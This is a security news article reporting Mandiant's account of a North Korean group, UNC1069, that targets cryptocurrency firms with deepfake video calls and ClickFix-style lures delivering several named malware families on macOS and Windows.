North Korean hackers are running highly targeted cyberattacks against companies in the cryptocurrency sector using AI-generated deepfake videos and a technique known as ClickFix to deliver malware on both macOS and Windows systems.
The campaign appears financially motivated and is focused on stealing sensitive data and cryptocurrency-related assets.
According to researchers from Mandiant, the activity was observed during the investigation of an attack on a fintech company. The researchers attributed the operation to UNC1069, a North Korean threat group that has been active since 2018 and is known for adapting its tactics to match high-value targets.
The attack relied heavily on social engineering. The victim was first contacted on Telegram by an account impersonating a senior executive from a cryptocurrency company. After gaining trust, the attackers shared a Calendly link that redirected the victim to a fake Zoom meeting page hosted on attacker-controlled infrastructure. During the meeting, the victim was shown what appeared to be a deepfake video of a well-known crypto CEO.
Mandiant says the attackers pretended there were audio problems during the call and instructed the victim to run troubleshooting commands shown on a webpage. These commands triggered the infection process, with separate payloads designed for both Windows and macOS systems.
On macOS, the infection chain involved AppleScript execution followed by the deployment of a malicious Mach-O binary. Researchers identified seven different malware families, including WAVESHAPER, HYPERCALL, HIDDENCALL, SILENCELIFT, DEEPBREATH, SUGARLOADER, and CHROMEPUSH. These tools were used to steal credentials, browser data, keychain information, Telegram data, and even disrupt communications. Several of these malware strains, including SILENCELIFT, DEEPBREATH, and CHROMEPUSH, were previously undocumented.
Of all the malware identified, SUGARLOADER had the highest detection rate on VirusTotal, while most of the others had little to no prior detection, highlighting how stealthy and targeted the campaign was. Mandiant noted that deploying so many different malware tools against a single victim is unusual and points to a deliberate effort to extract as much data as possible.
The researchers believe the stolen data serves two purposes: direct cryptocurrency theft and enabling future social engineering attacks by exploiting the victim’s identity and private information. A similar technique was reported in mid-2025 by Huntress researchers, who linked it to BlueNoroff, another North Korean group also known as Sapphire Sleet and TA44.
If this article helped you, please consider supporting our work. Every small contribution keeps Abijita.com independent and running.
Mandiant says UNC1069 has steadily evolved over the years. After initially targeting various sectors, the group shifted its focus to the Web3 industry in 2023, including exchanges, developers, and venture capital firms. In 2025, the hackers expanded further into financial services, payments, brokerage platforms, and crypto wallet infrastructure, signaling a continued and growing threat to the global cryptocurrency ecosystem.
